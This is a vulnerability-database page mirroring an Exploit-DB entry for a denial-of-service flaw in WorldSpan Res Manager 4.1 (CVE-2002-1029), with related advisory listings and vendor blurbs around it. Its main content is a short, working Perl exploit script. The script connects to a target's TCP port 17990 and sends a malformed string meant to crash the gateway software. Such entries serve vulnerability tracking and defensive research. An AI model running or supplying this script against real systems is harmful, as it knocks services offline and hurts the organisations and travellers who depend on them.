Lucene search
+L

WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service

🗓️ 04 Jul 2002 00:00:00Reported by altomoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

WorldSpan Res Manager 4.1 has a Denial of Service vulnerability via malformed TCP packets.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-1029
31 Aug 200204:00
cve
Cvelist
CVE-2002-1029
31 Aug 200204:00
cvelist
EUVD
EUVD-2002-1018
7 Oct 202500:30
euvd
NVD
CVE-2002-1029
4 Oct 200204:00
nvd
OpenVAS
Worldspan Gateway DoS Vulnerability
3 Nov 200500:00
openvas
Tenable Nessus
Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS
19 Jul 200200:00
nessus
source: https://www.securityfocus.com/bid/5169/info

It has been reported that WorldSpan Res Manager 4.1 for Microsoft Windows is vulnerable to a denial of service condition.

Res Manager systems are connected to Worldspan via private lines or through the Internet. Before accessing Worldspan, clients must first go through a local gateway, which accepts connections from Res Manager clients via TCP port 17990. If a malformed packet is sent to this port, the gateway software attempts to process the packet and eventually crashes.

#!/usr/bin/perl
#[email protected]
#Worldspan Gateway DoS

$sabre = "worldspanshouldgoboom";

use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);


print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";

print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03213
32